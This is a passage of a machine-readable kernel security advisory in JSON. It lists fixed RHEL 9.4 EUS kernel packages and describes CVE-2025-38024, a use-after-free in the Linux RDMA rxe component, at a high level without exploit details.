"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: x86/tdx: Fix \"in-kernel MMIO\" check"
},
{
"cve": "CVE-2025-38024",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2025-06-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2373354"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s Remote Direct Memory Access (RDMA) subsystem, specifically within the `rxe` component. This use-after-free vulnerability occurs in the `rxe_create_cq` function. When the `rxe_cq_from_init` function fails, the subsequent call to `rxe_cleanup` attempts to free memory resources that have already been released, leading to memory corruption. A local attacker with high privileges could exploit this flaw to cause a denial of service or potentially achieve arbitrary code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Moderate: A use-after-free leading to a kernel information leak issue was seen in the Linux kernel\u0027s RDMA `rxe` component, which allows a local attacker with special group privilege to cause a denial of service. This flaw affects Red Hat Enterprise Linux 7, 8, and 9.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
